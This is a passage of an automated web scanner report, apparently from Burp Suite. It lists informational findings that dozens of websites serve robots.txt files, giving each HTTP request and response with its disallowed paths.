Date: Tue, 03 May 2011 11:04:51 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4
Last-Modified: Fri, 27 Feb 2009 10:40:40 GMT
ETag: "1410048-95-463e419991a00"
Accept-Ranges: bytes
Content-Length: 149
Connection: close
Content-Type: text/plain

# 20080811 dave

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /webalizer/

User-agent: *
Disallow: /cgi-bin/
Disallow: /webalizer/

26.609. http://www.lancomemail.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lancomemail.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lancomemail.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Wed, 29 Jul 2009 15:19:50 GMT
Accept-Ranges: bytes
ETag: "c294046010ca1:46e"
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA CONi OTR OUR DEM"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:23:11 GMT
Connection: close

User-agent: *
Disallow: /

26.610. http://www.laobserved.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.laobserved.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.laobserved.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:44:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 30 Mar 2009 01:05:34 GMT
ETag: "bac039-a5-4664badf5f380"
Accept-Ranges: bytes
Content-Length: 165
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /scgi-bin/
Disallow: /test/
Disallow: /mt-static/
Disallow: /newtest/
Disallow: /cgi-bin/
Disallow: /scgi-binBACKUP/
Disallow: /SAVEscgi-bin/

26.611. http://www.lasalle.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lasalle.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lasalle.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 07 Apr 2011 19:56:58 GMT
ETag: "1203b2-45-4a059830c5680"
Accept-Ranges: bytes
Content-Length: 69
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /portal/
Disallow: /testing/
Disallow: /MA/

26.612. http://www.lasvegasshows.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lasvegasshows.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lasvegasshows.com

Response

HTTP/1.1 200 OK
ETag: "b0ef3593bbb4ca1:0"
Accept-Ranges: bytes
Set-Cookie: X-Mapping-bghfahco=BC3E4A114CE30EBF57C561AF26C72A2D; path=/
Content-Length: 333
Date: Tue, 03 May 2011 10:51:31 GMT
Connection: close
Last-Modified: Tue, 23 Feb 2010 19:08:25 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Type: text/plain

...User-agent: *
Disallow: /_ajax/
Disallow: /_generics/
Disallow: /_popups/
Disallow: /information/error.htm
Disallow: /information/kiosk.aspx
Disallow: /information/kiosk.htm
Disallow: /infor
...[SNIP]...

26.613. http://www.latestngreatest.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.latestngreatest.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.latestngreatest.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:51 GMT
Server: Apache
Last-Modified: Thu, 11 Nov 2010 13:41:30 GMT
Accept-Ranges: bytes
Content-Length: 1649
Connection: close
Content-Type: text/plain

User-agent: Googlebot

Disallow: /*memberpanel
Disallow: /*v=search
Disallow: /*post
Disallow: /*portal
Disallow: /*display
Disallow: /*print
Disallow: /*report
Disallow: /*recommend
Disallow: /*login
...[SNIP]...

26.614. http://www.laworks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.laworks.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.laworks.com

Response

HTTP/1.0 200 OK
Server:
Content-Type: text/plain
Date: Tue, 03 May 2011 10:27:21 GMT
Content-Length: 159
Connection: close

#
# robots.txt for sfdc appservers.
#
# For use by salesforce.com
#
User-agent: * # applies to all robots
Disallow: / # disallow indexing of all pages

26.615. http://www.lclk.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lclk.info
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lclk.info

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:42 GMT
Server: Apache
Last-Modified: Sat, 25 Sep 2010 17:32:38 GMT
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /

26.616. http://www.learn-spanish-help.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.learn-spanish-help.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.learn-spanish-help.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:03:53 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.learn-spanish-help.com/HzDTzgCr.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /d
...[SNIP]...

26.617. http://www.learnatest.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.learnatest.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.learnatest.com

Response

HTTP/1.1 200 OK
Cache-Control: Private
Content-Length: 91
Content-Type: text/plain
Content-Location: http://www.learnatest.com/robots.txt
Expires: Now
Last-Modified: Tue, 22 Mar 2005 21:56:22 GMT
Accept-Ranges: bytes
ETag: "0471ffc292fc51:302"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 10:23:08 GMT
Connection: close
Set-Cookie: BIGipServerhttp_80_LAT=1073850560.20480.0000; path=/

User-agent: *
Disallow: /checkout
Disallow: /images
Disallow: /lx_images
Disallow: /MyLogin

26.618. http://www.learncookingrecipes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.learncookingrecipes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.learncookingrecipes.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.learncookingrecipes.com/xmlrpc.php
Set-Cookie: PHPSESSID=3of2c57maha9lgd42ust1fs150; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.learncookingrecipes.com/sitemap.xml.gz

26.619. http://www.leeprecision.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.leeprecision.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.leeprecision.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:45 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 16:44:06 GMT
Accept-Ranges: bytes
Content-Length: 35
Cache-Control: max-age=2419200
Expires: Tue, 31 May 2011 10:27:45 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /staff/

26.620. http://www.legalandrew.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.legalandrew.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.legalandrew.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:35 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
X-Pingback: http://www.legalandrew.com/xmlrpc.php
Set-Cookie: wp_ozh_wsa_visits=1; expires=Wed, 02 May 2012 10:49:36 GMT; path=/
Set-Cookie: wp_ozh_wsa_visit_lasttime=1304419776; expires=Wed, 02 May 2012 10:49:36 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.legalandrew.com/sitemap.xml.gz

26.621. http://www.legendarytimes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.legendarytimes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.legendarytimes.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:24 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Thu, 18 Dec 2003 18:07:48 GMT
ETag: "11480c7-26-19de2500"
Accept-Ranges: bytes
Content-Length: 38
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /cgi-bin,/css

26.622. http://www.lesboteensblog.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lesboteensblog.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lesboteensblog.com

Response

HTTP/1.1 200 OK
Server: nginx/0.9.7
Date: Tue, 03 May 2011 11:03:23 GMT
Content-Type: text/plain; charset=cp1251
Connection: close
Last-Modified: Thu, 17 Jun 2010 12:12:20 GMT
ETag: "346874b-1b-48938c00b9100"
Accept-Ranges: bytes
Content-Length: 27

User-agent: *
Allow: /

26.623. http://www.lespac.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lespac.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lespac.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:53 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 14:59:35 GMT
ETag: "4789d5-35a-3dae63c0"
Accept-Ranges: bytes
Content-Length: 858
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /placez_une_annonce.php
Disallow: /subscription*
Disallow: /forfait_paiment.php
Disallow: /forfait_confirme_paiment.php
Disallow: /zone.php
Disallow: /mes_pac*.php
Disal
...[SNIP]...

26.624. http://www.libraryspot.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.libraryspot.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.libraryspot.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:38 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6 mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Wed, 02 May 2001 19:30:35 GMT
ETag: "b39d03-22-5a448cc0"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: LinkGuard
Disallow: /

26.625. http://www.lifesambrosia.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifesambrosia.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lifesambrosia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:10:58 GMT
Server: Apache
Vary: *
Last-Modified: Wed, 24 Dec 2008 07:50:52 GMT
ETag: "30e80c5-19c-4951e9dc"
Accept-Ranges: bytes
Content-Length: 412
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /blog/wp-admin
Disallow: /blog/wp-includes
Disallow: /blog/wp-content

User-agent: Mediapartners-Google
Allow: /

User-agent: Adsbot-Google
Allow: /

User-agent: Googlebot-Imag
...[SNIP]...

26.626. http://www.lightreading.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lightreading.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lightreading.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 03 May 2011 10:30:15 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Wed, 12 May 2010 11:19:34 GMT
Accept-Ranges: bytes
ETag: "0e7bdffc4f1ca1:0"
X-Powered-By: ASP.NET
Content-Length: 391

User-agent: *
Disallow: /ad2_view.asp
Disallow: /ad2_redirect.asp
Disallow: /ad_view.asp
Disallow: /ad_redirect.asp
Disallow: /ad_build.asp
Disallow: /login.asp
Disallow: /search.asp
Disallow: /email.
...[SNIP]...

26.627. http://www.linksysbycisco.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linksysbycisco.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linksysbycisco.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:19 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 18 Aug 2009 22:55:53 GMT
ETag: "9fac0-1c1-6ba49040"
Accept-Ranges: bytes
Content-Length: 449
Content-Type: text/plain
Connection: close

User-Agent: *
Sitemap: http://www.linksysbycisco.com/static/sitemap.xml

Disallow: /LinksysByCisco/
Disallow: /linksysbycisco/
Disallow: /scripts/
Disallow: /css/
Disallow: /downloads/
Disallow: /PROD
...[SNIP]...

26.628. http://www.lionel.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lionel.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lionel.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 22 Feb 2010 17:58:23 GMT
Accept-Ranges: bytes
ETag: "8049e79fe8b3ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:36:15 GMT
Connection: close
Content-Length: 108

User-Agent: *
Disallow: /CustomerService/ReplacementParts/
Disallow: /CustomerService/service-documents/

26.629. http://www.little-tiny.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.little-tiny.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.little-tiny.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:35 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "210629f-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

26.630. http://www.littlebigplanet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.littlebigplanet.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.littlebigplanet.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 03 May 2011 10:12:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=86400,public
Content-Length: 63
Date: Tue, 03 May 2011 10:34:40 GMT
X-Varnish: 2241103078 2241096089
Age: 1350
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /psn/login.php
Disallow: /psn/
Allow: /

26.631. http://www.liu.se/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.liu.se
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.liu.se

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:42 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 15:14:30 GMT
ETag: "c60031-289-49d957c6c4180"
Accept-Ranges: bytes
Content-Length: 649
Content-Type: text/plain; charset=ISO-8859-1
Connection: close

# Robots.txt for http://www.liu.se/

User-agent: SiteSeekerCrawler/1.0

Disallow: /en/research/

Disallow: /facebook/

Disallow: /insidan/webbpublicering/test/

Disallow: /om-liu/test/

Disallow: /sit
...[SNIP]...

26.632. http://www.live-server20.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.live-server20.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.live-server20.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:41 GMT
Server: Apache
Last-Modified: Wed, 05 May 2010 05:33:34 GMT
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.633. http://www.livingontheedge.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livingontheedge.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livingontheedge.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 20 Oct 2009 21:32:51 GMT
ETag: "1b2ab62-2c-9ab1e6c0"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /archived/
Allow: /

26.634. http://www.livingwithout.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livingwithout.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livingwithout.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:22 GMT
Server: Apache/2
Set-Cookie: Apache=173.193.214.243.1304420362513066; path=/; expires=Wed, 02-May-12 10:59:22 GMT
X-Powered-By: PHP/5.2.10
Content-Length: 329
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: Coyote-2-a011349=a011064:0; path=/

User-agent: *
Disallow: /apps/
Disallow: /cgi-bin/
Disallow: /css/
Disallow: /custom/
Disallow: /favicon.ico
Disallow: /images/
Disallow: /issues/cgi-bin/
Disallow: /javascript/
Disallow: /js/
Disallo
...[SNIP]...

26.635. http://www.lmsal.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lmsal.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lmsal.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8j DAV/2
Last-Modified: Wed, 13 May 1998 01:12:26 GMT
ETag: "30c05-1a-32e0489285280"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.636. http://www.lmtribune.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lmtribune.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lmtribune.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:26:02 GMT
Server: Apache/2.2.11 (FreeBSD) mod_ssl/2.2.11 OpenSSL/0.9.8e DAV/2 PHP/5.2.9 with Suhosin-Patch
Last-Modified: Sun, 12 Apr 2009 08:21:40 GMT
ETag: "cd39c7-23-4675749834d00"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /adserver/

26.637. http://www.loanworkout.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.loanworkout.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.loanworkout.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:08 GMT
Server: Apache
X-Pingback: http://loanworkout.org/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.638. http://www.logicbuy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.logicbuy.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.logicbuy.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 26 Apr 2011 16:34:55 GMT
Accept-Ranges: bytes
ETag: "71f831e02f4cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 177
Cache-Control: max-age=365351
Date: Tue, 03 May 2011 10:32:45 GMT
Connection: close

...User-agent: *
Disallow: /OpenDeal.aspx
Disallow: /OpenStore.aspx
Disallow: /OpenEbay.aspx
Disallow: /*login=facebook
Disallow: /static.logicbuy.com/
Disallow: /product/

26.639. http://www.logler.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.logler.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.logler.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 24 Aug 2010 00:54:24 GMT
ETag: "4d8897-530-48e8734c69000"
Accept-Ranges: bytes
Content-Length: 1328
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:11:17 GMT
Connection: close
Content-Type: text/plain

#
User-Agent: *
Allow: /
# Directories
Disallow: /database/
Disallow: /includes/
Disallow: /myinc/
Disallow: /cache/
Disallow: /generate/
Disallow: /misc/
Disallow: /modules/
Disallow: /sites/
Disallo
...[SNIP]...

26.640. http://www.lolclips.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lolclips.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lolclips.net

Response

HTTP/1.1 200 OK
Content-Length: 59
Content-Type: text/plain
Last-Modified: Tue, 15 Apr 2008 22:06:40 GMT
Accept-Ranges: bytes
ETag: "09822fb449fc81:455a"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:44:23 GMT
Connection: close

User-agent: *
Disallow: /out.aspx
Disallow: /imagead.aspx

26.641. http://www.longhaircommunity.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.longhaircommunity.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.longhaircommunity.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:02:44 GMT
Server: Apache/1.3.36 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.2 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.27 OpenSSL/0.9.7a
Last-Modified: Wed, 30 Apr 2008 05:29:15 GMT
ETag: "12192c8-b23-481803ab"
Accept-Ranges: bytes
Content-Length: 2851
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forums/ajax.php
Disallow: /forums/admincp/
Disallow: /forums/attachment.php
Disallow: /forums/avatar.php
Disallow: /forums/calendar.php
Disallow: /forums/clientscript/

...[SNIP]...

26.642. http://www.lookoutlanding.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lookoutlanding.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lookoutlanding.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:07 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:38 GMT
ETag: "8281b-d0-49e83f79b6018"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

26.643. http://www.loti.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.loti.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.loti.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:27 GMT
Server: Apache/2.2.17
Last-Modified: Tue, 22 Mar 2011 05:31:44 GMT
ETag: "2b-49f0b8f459000"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

26.644. http://www.lotto.pl/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lotto.pl
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lotto.pl

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:38 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2005 20:18:43 GMT
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=iso-8859-2

User-agent: *
Disallow: *

26.645. http://www.louisvilleky.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.louisvilleky.gov
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.louisvilleky.gov

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 177
Date: Tue, 03 May 2011 11:16:13 GMT
Content-Type: text/plain
ETag: "2ada713853d3c61:db6"
Server: Microsoft-IIS/6.0
Last-Modified: Fri, 08 Sep 2006 14:29:40 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET

# Robots.txt file for http://www.louisvilleky.gov
#

User-agent: *
Disallow: /www.louisvilleky.gov/Coveo/
Disallow: SearchSummary.htm

User-agent: Fasterfox
Disallow: /

26.646. http://www.luggagepros.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.luggagepros.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.luggagepros.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:29:14 GMT
Server: Apache
Set-Cookie: frontend=5sktabusj47kpl73dfsevd61h5; expires=Mon, 01-Aug-2011 11:29:14 GMT; path=/; domain=www.luggagepros.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /customer/
Disallow: /checkout/
Disallow: /wishlist/
Disallow: /mail/
Disallow: /catalog/
Disallow: /report/
Disallow: /catalogsearch/
Disallow: /lpcatalog/
Sitemap: h
...[SNIP]...

26.647. http://www.lynncoins.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lynncoins.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lynncoins.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:41 GMT
Server: Apache
Last-Modified: Wed, 14 Jul 2010 02:13:02 GMT
ETag: "fd80e7-6a-867f2780"
Accept-Ranges: bytes
Content-Length: 106
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /cgi-bin/
Disallow: /wusage

26.648. http://www.lyricsfire.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lyricsfire.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lyricsfire.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 01 Feb 2011 18:32:30 GMT
Accept-Ranges: bytes
Content-Length: 631
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 10:43:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /print
Disallow: /rate
